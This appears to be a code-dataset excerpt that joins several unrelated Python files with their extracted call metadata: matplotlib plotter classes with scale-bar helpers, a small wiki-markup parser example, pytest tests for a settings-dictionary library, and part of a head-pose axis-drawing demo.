# If an axis is input, plot there; otherwise make a new figure and axis
if self.axis is None:
final = True
self.metafig = MetaFigure(kind=self.kind, **kwargs)
self.fig = self.metafig.fig
self.axis = self.metafig.ax
else:
self.fig = self.axis.figure
# Attach plotter to its MetaFigure
self.metafig.plotters.append(self)
def loadData(self, fileName, fileDir=None, sim=None):
from ..analysis import loadData
self.data = loadData(fileName=fileName, fileDir=fileDir, sim=None)
def saveData(self, fileName=None, fileDesc=None, fileType=None, fileDir=None, sim=None, **kwargs):
from ..analysis import saveData as saveFigData
saveFigData(self.data, fileName=fileName, fileDesc=fileDesc, fileType=fileType, fileDir=fileDir, sim=sim, **kwargs)
def formatAxis(self, **kwargs):
if 'title' in kwargs:
self.axis.set_title(kwargs['title'])
if 'xlabel' in kwargs:
self.axis.set_xlabel(kwargs['xlabel'])
if 'ylabel' in kwargs:
self.axis.set_ylabel(kwargs['ylabel'])
if 'xlim' in kwargs:
if kwargs['xlim'] is not None:
self.axis.set_xlim(kwargs['xlim'])
if 'ylim' in kwargs:
if kwargs['ylim'] is not None:
self.axis.set_ylim(kwargs['ylim'])
if 'invert_yaxis' in kwargs:
if kwargs['invert_yaxis'] is True:
self.axis.invert_yaxis()
def addLegend(self, handles=None, labels=None, **kwargs):
legendParams = ['loc', 'bbox_to_anchor', 'fontsize', 'numpoints', 'scatterpoints', 'scatteryoffsets', 'markerscale', 'markerfirst', 'frameon', 'fancybox', 'shadow', 'framealpha', 'facecolor', 'edgecolor', 'mode', 'bbox_transform', 'title', 'title_fontsize', 'borderpad', 'labelspacing', 'handlelength', 'handletextpad', 'borderaxespad', 'columnspacing', 'handler_map']
# Check for and apply any legend parameters in the kwargs
legendKwargs = {}
for kwarg in kwargs:
if kwarg in legendParams:
legendKwargs[kwarg] = kwargs[kwarg]
# If 'legendKwargs' is found in kwargs, use those values instead of the defaults
if 'legendKwargs' in kwargs:
legendKwargs_new = kwargs['legendKwargs']
for key in legendKwargs_new:
if key in legendParams:
legendKwargs[key] = legendKwargs_new[key]
cur_handles, cur_labels = self.axis.get_legend_handles_labels()
if not handles:
handles = cur_handles
if not labels:
labels = cur_labels
self.axis.legend(handles, labels, **legendKwargs)
def addScalebar(self, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs):
add_scalebar(self.axis, matchx=matchx, matchy=matchy, hidex=hidex, hidey=hidey, unitsx=unitsx, unitsy=unitsy, scalex=scalex, scaley=scaley, xmax=xmax, ymax=ymax, space=space, **kwargs)
def addColorbar(self, **kwargs):
plt.colorbar(mappable=self.axis.get_images()[0], ax=self.axis, **kwargs)
def finishAxis(self, **kwargs):
self.formatAxis(**kwargs)
if 'saveData' in kwargs:
if kwargs['saveData']:
self.saveData(**kwargs)
if 'dpi' in kwargs:
if kwargs['dpi']:
self.fig.set_dpi(kwargs['dpi'])
if 'figSize' in kwargs:
if kwargs['figSize']:
self.fig.set_size_inches(kwargs['figSize'])
if 'legend' in kwargs:
if kwargs['legend'] is True:
self.addLegend(**kwargs)
elif type(kwargs['legend']) == dict:
self.addLegend(**kwargs['legend'])
if 'scalebar' in kwargs:
if kwargs['scalebar'] is True:
self.addScalebar()
elif type(kwargs['scalebar']) == dict:
self.addScalebar(**kwargs['scalebar'])
if 'colorbar' in kwargs:
if kwargs['colorbar'] is True:
self.addColorbar()
elif type(kwargs['colorbar']) == dict:
self.addColorbar(**kwargs['colorbar'])
if 'grid' in kwargs:
self.axis.minorticks_on()
if kwargs['grid'] is True:
self.axis.grid()
elif type(kwargs['grid']) == dict:
self.axis.grid(**kwargs['grid'])
# If this is the only axis on the figure, finish the figure
if type(self.metafig.ax) != list:
self.metafig.finishFig(**kwargs)
# Reset the matplotlib rcParams to their original settings
mpl.style.use(self.metafig.orig_rcParams)
class ScatterPlotter(GeneralPlotter):
"""A class used for scatter plotting"""
def __init__(self, data, axis=None, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'scatter'
self.x = data.get('x')
self.y = data.get('y')
self.s = data.get('s')
self.c = data.get('c')
self.marker = data.get('marker')
self.linewidth = data.get('linewidth')
self.cmap = data.get('cmap')
self.norm = data.get('norm')
self.alpha = data.get('alpha')
self.linewidths = data.get('linewidths')
def plot(self, **kwargs):
scatterPlot = self.axis.scatter(x=self.x, y=self.y, s=self.s, c=self.c, marker=self.marker, linewidth=self.linewidth, cmap=self.cmap, norm=self.norm, alpha=self.alpha, linewidths=self.linewidths)
self.finishAxis(**kwargs)
return self.fig
class LinePlotter(GeneralPlotter):
"""A class used for plotting one line per subplot"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'line'
self.x = np.array(data.get('x'))
self.y = np.array(data.get('y'))
self.color = data.get('color')
self.marker = data.get('marker')
self.markersize = data.get('markersize')
self.linewidth = data.get('linewidth')
self.alpha = data.get('alpha')
def plot(self, **kwargs):
linePlot = self.axis.plot(self.x, self.y, color=self.color, marker=self.marker, markersize=self.markersize, linewidth=self.linewidth, alpha=self.alpha)
self.finishAxis(**kwargs)
return self.fig
class LinesPlotter(GeneralPlotter):
"""A class used for plotting multiple lines on the same axis"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'lines'
self.x = np.array(data.get('x'))
self.y = np.array(data.get('y'))
self.color = data.get('color')
self.marker = data.get('marker')
self.markersize = data.get('markersize')
self.linewidth = data.get('linewidth')
self.alpha = data.get('alpha')
self.label = data.get('label')
def plot(self, **kwargs):
numLines = len(self.y)
if type(self.color) != list:
colors = [self.color for line in range(numLines)]
else:
colors = self.color
if type(self.marker) != list:
markers = [self.marker for line in range(numLines)]
else:
markers = self.marker
if type(self.markersize) != list:
markersizes = [self.markersize for line in range(numLines)]
else:
markersizes = self.markersize
if type(self.linewidth) != list:
linewidths = [self.linewidth for line in range(numLines)]
else:
linewidths = self.linewidth
if type(self.alpha) != list:
alphas = [self.alpha for line in range(numLines)]
else:
alphas = self.alpha
if self.label is None:
labels = [None for line in range(numLines)]
else:
labels = self.label
for index, line in enumerate(self.y):
self.axis.plot(
self.x,
self.y[index],
color=colors[index],
marker=markers[index],
markersize=markersizes[index],
linewidth=linewidths[index],
alpha=alphas[index],
label=labels[index],
)
self.finishAxis(**kwargs)
return self.fig
class HistPlotter(GeneralPlotter):
"""A class used for histogram plotting"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'histogram'
self.x = data.get('x')
self.bins = data.get('bins', None)
self.range = data.get('range', None)
self.density = data.get('density', False)
self.weights = data.get('weights', None)
self.cumulative = data.get('cumulative', False)
self.bottom = data.get('bottom', None)
self.histtype = data.get('histtype', 'bar')
self.align = data.get('align', 'mid')
self.orientation = data.get('orientation', 'vertical')
self.rwidth = data.get('rwidth', None)
self.log = data.get('log', False)
self.color = data.get('color', None)
self.alpha = data.get('alpha', None)
self.label = data.get('label', None)
self.stacked = data.get('stacked', False)
self.data = data.get('data', None)
def plot(self, **kwargs):
histPlot = self.axis.hist(self.x, bins=self.bins, range=self.range, density=self.density, weights=self.weights, cumulative=self.cumulative, bottom=self.bottom, histtype=self.histtype, align=self.align, orientation=self.orientation, rwidth=self.rwidth, log=self.log, color=self.color, alpha=self.alpha, label=self.label, stacked=self.stacked, data=self.data)
self.finishAxis(**kwargs)
return self.fig
class ImagePlotter(GeneralPlotter):
"""A class used for image plotting using plt.imshow"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'image'
self.X = data.get('X')
self.cmap = data.get('cmap', None)
self.norm = data.get('norm', None)
self.aspect = data.get('aspect', None)
self.interpolation = data.get('interpolation', None)
self.alpha = data.get('alpha', None)
self.vmin = data.get('vmin', None)
self.vmax = data.get('vmax', None)
self.origin = data.get('origin', None)
self.extent = data.get('extent', None)
self.aspect = data.get('aspect', None)
self.interpolation = data.get('interpolation', None)
self.filternorm = data.get('filternorm', True)
self.filterrad = data.get('filterrad', 4.0)
self.resample = data.get('resample', None)
self.url = data.get('url', None)
self.data = data.get('data', None)
def plot(self, **kwargs):
imagePlot = self.axis.imshow(self.X, cmap=self.cmap, norm=self.norm, aspect=self.aspect, interpolation=self.interpolation, alpha=self.alpha, vmin=self.vmin, vmax=self.vmax, origin=self.origin, extent=self.extent, filternorm=self.filternorm, filterrad=self.filterrad, resample=self.resample, url=self.url, data=self.data)
self.finishAxis(**kwargs)
return self.fig
class AnchoredScaleBar(AnchoredOffsetbox):
"""
A class used for adding scale bars to plots
"""
def __init__(self, axis, sizex=0, sizey=0, labelx=None, labely=None, loc=4, pad=0.1, borderpad=0.1, sep=2, prop=None, barcolor="black", barwidth=None, **kwargs):
"""
Draw a horizontal and/or vertical bar with the size in data coordinate
of the give axes. A label will be drawn underneath (center-aligned).
- transform : the coordinate frame (typically axes.transData)
- sizex,sizey : width of x,y bar, in data units. 0 to omit
- labelx,labely : labels for x,y bars; None to omit
- loc : position in containing axes
- pad, borderpad : padding, in fraction of the legend font size (or prop)
- sep : separation between labels and bars in points.
- **kwargs : additional arguments passed to base class constructor
"""
from matplotlib.patches import Rectangle
from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea
bars = AuxTransformBox(axis.transData)
if sizex:
if axis.xaxis_inverted():
sizex = -sizex
bars.add_artist(Rectangle((0,0), sizex, 0, ec=barcolor, lw=barwidth, fc="none"))
if sizey:
if axis.yaxis_inverted():
sizey = -sizey
bars.add_artist(Rectangle((0,0), 0, sizey, ec=barcolor, lw=barwidth, fc="none"))
if sizex and labelx:
self.xlabel = TextArea(labelx)
bars = VPacker(children=[bars, self.xlabel], align="center", pad=0, sep=sep)
if sizey and labely:
self.ylabel = TextArea(labely)
bars = HPacker(children=[self.ylabel, bars], align="center", pad=0, sep=sep)
AnchoredOffsetbox.__init__(self, loc, pad=pad, borderpad=borderpad, child=bars, prop=prop, frameon=False, **kwargs)
def add_scalebar(axis, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs):
"""
Add scalebars to axes
Adds a set of scale bars to *ax*, matching the size to the ticks of the plot and optionally hiding the x and y axes
- axis : the axis to attach ticks to
- matchx,matchy : if True, set size of scale bars to spacing between ticks, if False, set size using sizex and sizey params
- hidex,hidey : if True, hide x-axis and y-axis of parent
- **kwargs : additional arguments passed to AnchoredScaleBars
Returns created scalebar object
"""
def get_tick_size(subaxis):
tick_size = None
tick_locs = subaxis.get_majorticklocs()
if len(tick_locs)>1:
tick_size = np.abs(tick_locs[1] - tick_locs[0])
return tick_size
if matchx:
sizex = get_tick_size(axis.xaxis)
if matchy:
sizey = get_tick_size(axis.yaxis)
if 'sizex' in kwargs:
sizex = kwargs['sizex']
if 'sizey' in kwargs:
sizey = kwargs['sizey']
def autosize(value, maxvalue, scale, n=1, m=10):
round_to_n = lambda value, n, m: int(np.ceil(round(value, -int(np.floor(np.log10(abs(value)))) + (n - 1)) / m)) * m
while value > maxvalue:
try:
value = round_to_n(0.8 * maxvalue * scale, n, m) / scale
except:
value /= 10.0
m /= 10.0
return value
if ymax is not None and sizey>ymax:
sizey = autosize(sizey, ymax, scaley)
if xmax is not None and sizex>xmax:
sizex = autosize(sizex, xmax, scalex)
kwargs['sizex'] = sizex
kwargs['sizey'] = sizey
if unitsx is None:
unitsx = ''
if unitsy is None:
unitsy = ''
if 'labelx' not in kwargs or kwargs['labelx'] is None:
kwargs['labelx'] = '%.3g %s'%(kwargs['sizex'] * scalex, unitsx)
if 'labely' not in kwargs or kwargs['labely'] is None:
kwargs['labely'] = '%.3g %s'%(kwargs['sizey'] * scaley, unitsy)
# add space for scalebar
if space is not None:
ylim0, ylim1 = axis.get_ylim()
ylim = (ylim0 - space, ylim1)
if ylim0 > ylim1: # if y axis is inverted
ylim = (ylim0 + space, ylim1)
axis.set_ylim(ylim)
scalebar = AnchoredScaleBar(axis, **kwargs)
axis.add_artist(scalebar)
if hidex:
axis.xaxis.set_visible(False)
if hidey:
axis.yaxis.set_visible(False)
if hidex and hidey:
axis.set_frame_on(False)
return scalebar
| [((36, 29, 36, 58), 'copy.deepcopy', 'deepcopy', ({(36, 38, 36, 57): 'mpl.rcParamsDefault'}, {}), '(mpl.rcParamsDefault)', False, 'from copy import deepcopy\n'), ((74, 28, 74, 80), 'matplotlib.pyplot.subplots', 'plt.subplots', (), '', True, 'import matplotlib.pyplot as plt\n'), ((171, 8, 171, 41), 'matplotlib.style.use', 'mpl.style.use', ({(171, 22, 171, 40): 'self.orig_rcParams'}, {}), '(self.orig_rcParams)', True, 'import matplotlib as mpl\n'), ((341, 8, 341, 49), 'matplotlib.style.use', 'mpl.style.use', ({(341, 22, 341, 48): 'self.metafig.orig_rcParams'}, {}), '(self.metafig.orig_rcParams)', True, 'import matplotlib as mpl\n'), ((564, 15, 564, 46), 'matplotlib.offsetbox.AuxTransformBox', 'AuxTransformBox', ({(564, 31, 564, 45): 'axis.transData'}, {}), '(axis.transData)', False, 'from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea\n'), ((581, 8, 581, 123), 'matplotlib.offsetbox.AnchoredOffsetbox.__init__', 'AnchoredOffsetbox.__init__', (), '', False, 'from matplotlib.offsetbox import AnchoredOffsetbox\n'), ((69, 23, 69, 45), 'numpy.max', 'np.max', ({(69, 30, 69, 44): '[nrows, ncols]'}, {}), '([nrows, ncols])', True, 'import numpy as np\n'), ((118, 23, 118, 54), 'os.path.join', 'os.path.join', ({(118, 36, 118, 43): 'fileDir', (118, 45, 118, 53): 'fileName'}, {}), '(fileDir, fileName)', False, 'import os\n'), ((121, 18, 121, 42), 'os.path.isfile', 'os.path.isfile', ({(121, 33, 121, 41): 'fileName'}, {}), '(fileName)', False, 'import os\n'), ((156, 12, 156, 30), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((168, 12, 168, 31), 'matplotlib.pyplot.close', 'plt.close', ({(168, 22, 168, 30): 'self.fig'}, {}), '(self.fig)', True, 'import matplotlib.pyplot as plt\n'), ((193, 15, 193, 35), 'os.path.isfile', 'os.path.isfile', ({(193, 30, 193, 34): 'data'}, {}), '(data)', False, 'import os\n'), ((575, 26, 575, 42), 'matplotlib.offsetbox.TextArea', 'TextArea', ({(575, 35, 575, 41): 'labelx'}, {}), '(labelx)', False, 'from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea\n'), ((576, 19, 576, 88), 'matplotlib.offsetbox.VPacker', 'VPacker', (), '', False, 'from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea\n'), ((578, 26, 578, 42), 'matplotlib.offsetbox.TextArea', 'TextArea', ({(578, 35, 578, 41): 'labely'}, {}), '(labely)', False, 'from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea\n'), ((579, 19, 579, 88), 'matplotlib.offsetbox.HPacker', 'HPacker', (), '', False, 'from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea\n'), ((601, 24, 601, 59), 'numpy.abs', 'np.abs', ({(601, 31, 601, 58): 'tick_locs[1] - tick_locs[0]'}, {}), '(tick_locs[1] - tick_locs[0])', True, 'import numpy as np\n'), ((158, 12, 158, 30), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((568, 28, 568, 91), 'matplotlib.patches.Rectangle', 'Rectangle', (), '', False, 'from matplotlib.patches import Rectangle\n'), ((572, 28, 572, 91), 'matplotlib.patches.Rectangle', 'Rectangle', (), '', False, 'from matplotlib.patches import Rectangle\n')] |
klahnakoski/mo-parsing | examples/simpleWiki.py | 885bf3fd61430d5fa15164168b975b18988fcf9e | from mo_parsing.helpers import QuotedString
wikiInput = """
Here is a simple Wiki input:
*This is in italics.*
**This is in bold!**
***This is in bold italics!***
Here's a URL to {{Pyparsing's Wiki Page->https://site-closed.wikispaces.com}}
"""
def convertToHTML(opening, closing):
def conversionParseAction(t, l, s):
return opening + t[0] + closing
return conversionParseAction
italicized = QuotedString("*").add_parse_action(convertToHTML("<I>", "</I>"))
bolded = QuotedString("**").add_parse_action(convertToHTML("<B>", "</B>"))
boldItalicized = QuotedString("***").add_parse_action(convertToHTML("<B><I>", "</I></B>"))
def convertToHTML_A(t, l, s):
try:
text, url = t[0].split("->")
except ValueError:
raise ParseFatalException(s, l, "invalid URL link reference: " + t[0])
return '<A href="{}">{}</A>'.format(url, text)
urlRef = QuotedString("{{", end_quote_char="}}").add_parse_action(convertToHTML_A)
wikiMarkup = urlRef | boldItalicized | bolded | italicized
| [((19, 13, 19, 30), 'mo_parsing.helpers.QuotedString', 'QuotedString', ({(19, 26, 19, 29): '"""*"""'}, {}), "('*')", False, 'from mo_parsing.helpers import QuotedString\n'), ((20, 9, 20, 27), 'mo_parsing.helpers.QuotedString', 'QuotedString', ({(20, 22, 20, 26): '"""**"""'}, {}), "('**')", False, 'from mo_parsing.helpers import QuotedString\n'), ((21, 17, 21, 36), 'mo_parsing.helpers.QuotedString', 'QuotedString', ({(21, 30, 21, 35): '"""***"""'}, {}), "('***')", False, 'from mo_parsing.helpers import QuotedString\n'), ((32, 9, 32, 48), 'mo_parsing.helpers.QuotedString', 'QuotedString', (), '', False, 'from mo_parsing.helpers import QuotedString\n')] |
wheelercj/app_settings | tests/test_app_settings_dict.py | 06224dec0b5baf1eeb92e5a81ca4e8385d4942a6 | import pytest
import re
from typing import Any, Tuple
from dataclasses import dataclass
from app_settings_dict import Settings
def test_simple_settings() -> None:
settings = Settings(
settings_file_path="C:/Users/chris/Documents/sample_settings_file_name.json",
default_factories={
"key1": lambda: "value1",
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
del settings["key1"]
del settings["key2"]
assert "key1" not in settings
assert "key2" not in settings
assert settings["key1"] == "value1"
with pytest.raises(KeyError):
settings["key2"]
def test_default_settings() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
default_factories={
"key1": lambda: "value1",
"key2": lambda: "value2",
"key3": lambda: "value3",
},
default_settings={
"key3": [],
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == "value3"
del settings["key3"]
assert settings["key3"] == "value3"
settings.reset("key3")
assert settings["key3"] == []
settings["key3"] = "something"
assert settings["key3"] == "something"
settings.reset_all()
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == []
def test_load_without_file() -> None:
def sample_prompt_function(settings: Settings) -> Settings:
# s = input("Enter the settings: ")
return settings.update({"key1": "a", "key2": "b"})
settings = Settings(
settings_file_path="not a real file.yaml",
prompt_user_for_all_settings=sample_prompt_function,
default_factories={
"key1": lambda: "value1",
"key2": lambda: "value2",
"key3": lambda: "value3",
},
default_settings={
"key3": [],
"key4": "value4",
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == "value3"
settings.load(fallback_option="prompt user")
assert settings["key1"] == "a"
assert settings["key2"] == "b"
assert settings["key3"] == "value3"
with pytest.raises(KeyError):
settings["key4"]
settings.load(fallback_option="default settings")
assert settings["key1"] == "a"
assert settings["key2"] == "b"
assert settings["key3"] == "value3"
assert settings["key4"] == "value4"
settings.clear()
settings.load(fallback_option="default settings")
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == []
assert settings["key4"] == "value4"
with pytest.raises(ValueError):
settings.load(fallback_option="invalid option")
def test_load_after_empty() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
prompt_user_for_all_settings=lambda: 1 / 0,
default_factories={
"key1": lambda: "value1",
},
default_settings={
"key1": [],
},
data={
"key1": "hello",
},
)
assert settings["key1"] == "hello"
settings.clear()
assert settings["key1"] == "value1"
def test_prompt() -> None:
def sample_prompt_function() -> Any:
# s = input("Enter a setting: ")
return "a"
settings = Settings(
settings_file_path="sample settings file name.json",
prompt_user_for_all_settings=lambda: {"key1": "a", "key2": "b"},
default_factories={
"key1": sample_prompt_function,
"key2": lambda: "value2",
"key3": lambda: "value3",
},
default_settings={
"key3": [],
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
settings.prompt("key1")
assert settings["key1"] == "a"
def test_changing_settings_before_load() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
default_factories={
"key1": lambda: "value1",
},
default_settings={
"key1": [],
},
data={
"key1": "hello",
},
)
assert settings["key1"] == "hello"
settings.load(fallback_option="default settings")
assert settings["key1"] == "hello"
settings["key1"] = "a"
settings.load(fallback_option="default settings")
assert settings["key1"] == "a"
def test_update() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
default_factories={
"key1": lambda: "value1",
},
default_settings={
"key1": [],
},
data={
"key1": "hello",
},
)
assert settings["key1"] == "hello"
settings.update({"key1": "a"})
assert settings["key1"] == "a"
settings.update({"key2": "b"})
assert settings["key2"] == "b"
def test_Settings__is_using_json() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
default_factories={
"key1": lambda: "value1",
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings._Settings__is_using_json()
settings.settings_file_path = "sample_settings_file_name.yaml"
assert not settings._Settings__is_using_json()
def test_load_from_dict() -> None:
settings = Settings()
settings.load_from_dict(
{
"key1": "hello",
"key2": "world",
}
)
assert len(settings.data) == 0
settings = Settings(
data={
"key1": "a",
"key2": "b",
}
)
settings.load_from_dict(
{
"key1": "c",
"key2": "d",
}
)
assert settings.data["key1"] == "c"
assert settings.data["key2"] == "d"
def test_dump_to_dict() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
data={
"key1": "hello",
"key2": "world",
},
)
assert settings.dump_to_dict() == {
"key1": "hello",
"key2": "world",
}
def test_nested_Settings() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
default_settings={
"key6": [],
"key7": Settings(
data={
"key8": "value8",
}
),
},
data={
"key1": "hello",
"key2": "world",
"key3": "value3",
"key4": Settings(
settings_file_path="why would anyone want an inner file though.yaml",
data={
"key5": "value5",
},
),
},
)
assert settings.dump_to_dict() == {
"key1": "hello",
"key2": "world",
"key3": "value3",
"key4": {
"key5": "value5",
},
}
def test_creating_setting_after_init() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
default_settings={
"key1": [],
"key2": "value2",
},
)
with pytest.raises(KeyError):
settings["key3"] = "value3"
def test_prompt_error() -> None:
settings = Settings(
settings_file_path="nonexistent file.json",
default_settings={
"key1": [],
"key2": "value2",
},
)
with pytest.raises(ValueError):
settings.load(fallback_option="prompt user")
def test_nested_setting_loaders_and_dumpers() -> None:
@dataclass
class Coords:
x: int
y: int
def __init__(self, x_and_y: Tuple[int, int]) -> None:
self.x = x_and_y[0]
self.y = x_and_y[1]
settings = Settings(
setting_loader=Coords,
setting_dumper=lambda obj: (obj.x, obj.y),
data={
"location 1": Coords(x_and_y=(1, 2)),
"location 2": Coords(x_and_y=(3, 4)),
"patterns": Settings(
setting_loader=re.compile,
setting_dumper=lambda x: x.pattern,
data={
"phone number pattern": re.compile(r"\d{3}-?\d{3}-?\d{4}"),
"email address pattern": re.compile(
r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+"
),
},
),
},
)
settings_dict = settings.dump_to_dict()
assert settings_dict["location 1"] == (1, 2)
assert settings_dict["location 2"] == (3, 4)
assert settings_dict["patterns"]["phone number pattern"] == r"\d{3}-?\d{3}-?\d{4}"
assert (
settings_dict["patterns"]["email address pattern"]
== r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+"
)
settings.load_from_dict(settings_dict)
assert settings["location 1"] == Coords(x_and_y=(1, 2))
assert settings["location 2"] == Coords(x_and_y=(3, 4))
assert settings["patterns"]["phone number pattern"] == re.compile(
r"\d{3}-?\d{3}-?\d{4}"
)
assert settings["patterns"]["email address pattern"] == re.compile(
r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+"
)
def test_init_without_keywords() -> None:
with pytest.raises(TypeError):
Settings("sample settings file path.json")
| [((9, 15, 18, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((31, 15, 45, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((66, 15, 82, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((108, 15, 120, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((131, 15, 146, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((153, 15, 164, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((174, 15, 185, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((194, 15, 203, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((210, 15, 210, 25), 'app_settings_dict.Settings', 'Settings', ({}, {}), '()', False, 'from app_settings_dict import Settings\n'), ((218, 15, 223, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((235, 15, 241, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((282, 15, 288, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((294, 15, 300, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((26, 9, 26, 32), 'pytest.raises', 'pytest.raises', ({(26, 23, 26, 31): 'KeyError'}, {}), '(KeyError)', False, 'import pytest\n'), ((90, 9, 90, 32), 'pytest.raises', 'pytest.raises', ({(90, 23, 90, 31): 'KeyError'}, {}), '(KeyError)', False, 'import pytest\n'), ((103, 9, 103, 34), 'pytest.raises', 'pytest.raises', ({(103, 23, 103, 33): 'ValueError'}, {}), '(ValueError)', False, 'import pytest\n'), ((289, 9, 289, 32), 'pytest.raises', 'pytest.raises', ({(289, 23, 289, 31): 'KeyError'}, {}), '(KeyError)', False, 'import pytest\n'), ((301, 9, 301, 34), 'pytest.raises', 'pytest.raises', ({(301, 23, 301, 33): 'ValueError'}, {}), '(ValueError)', False, 'import pytest\n'), ((344, 59, 346, 5), 're.compile', 're.compile', ({(345, 8, 345, 30): '"""\\\\d{3}-?\\\\d{3}-?\\\\d{4}"""'}, {}), "('\\\\d{3}-?\\\\d{3}-?\\\\d{4}')", False, 'import re\n'), ((347, 60, 349, 5), 're.compile', 're.compile', ({(348, 8, 348, 40): '"""[\\\\w\\\\d.+-]+@[\\\\w\\\\d.-]+\\\\.[\\\\w\\\\d]+"""'}, {}), "('[\\\\w\\\\d.+-]+@[\\\\w\\\\d.-]+\\\\.[\\\\w\\\\d]+')", False, 'import re\n'), ((353, 9, 353, 33), 'pytest.raises', 'pytest.raises', ({(353, 23, 353, 32): 'TypeError'}, {}), '(TypeError)', False, 'import pytest\n'), ((354, 8, 354, 50), 'app_settings_dict.Settings', 'Settings', ({(354, 17, 354, 49): '"""sample settings file path.json"""'}, {}), "('sample settings file path.json')", False, 'from app_settings_dict import Settings\n'), ((253, 20, 257, 13), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((263, 20, 268, 13), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((325, 44, 325, 78), 're.compile', 're.compile', ({(325, 55, 325, 77): '"""\\\\d{3}-?\\\\d{3}-?\\\\d{4}"""'}, {}), "('\\\\d{3}-?\\\\d{3}-?\\\\d{4}')", False, 'import re\n'), ((326, 45, 328, 21), 're.compile', 're.compile', ({(327, 24, 327, 56): '"""[\\\\w\\\\d.+-]+@[\\\\w\\\\d.-]+\\\\.[\\\\w\\\\d]+"""'}, {}), "('[\\\\w\\\\d.+-]+@[\\\\w\\\\d.-]+\\\\.[\\\\w\\\\d]+')", False, 'import re\n')] |
jacke121/FSA-Net | demo/demo_FSANET_ssd.py | c4d60bd38e9d17b0ea33d824ec443a01bdeba015 | import os
import time
import cv2
import sys
sys.path.append('..')
import numpy as np
from math import cos, sin
from lib.FSANET_model import *
import numpy as np
from keras.layers import Average
def draw_axis(img, yaw, pitch, roll, tdx=None, tdy=None, size = 50):
print(yaw,roll,pitch)
pitch = pitch * np.pi / 180
yaw = -(yaw * np.pi / 180)
roll = roll * np.pi / 180
if tdx != None and tdy != None:
tdx = tdx
tdy = tdy
else:
height, width = img.shape[:2]
tdx = width / 2
tdy = height / 2
# X-Axis pointing to right. drawn in red
x1 = size * (cos(yaw) * cos(roll)) + tdx
y1 = size * (cos(pitch) * sin(roll) + cos(roll) * sin(pitch) * sin(yaw)) + tdy
# Y-Axis | drawn in green
# v
x2 = size * (-cos(yaw) * sin(roll)) + tdx
y2 = size * (cos(pitch) * cos(roll) - sin(pitch) * sin(yaw) * sin(roll)) + tdy
# Z-Axis (out of the screen) drawn in blue
x3 = size * (sin(yaw)) + tdx
y3 = size * (-cos(yaw) * sin(pitch)) + tdy
cv2.line(img, (int(tdx), int(tdy)), (int(x1),int(y1)),(0,0,255),3)
cv2.line(img, (int(tdx), int(tdy)), (int(x2),int(y2)),(0,255,0),3)
cv2.line(img, (int(tdx), int(tdy)), (int(x3),int(y3)),(255,0,0),2)
return img
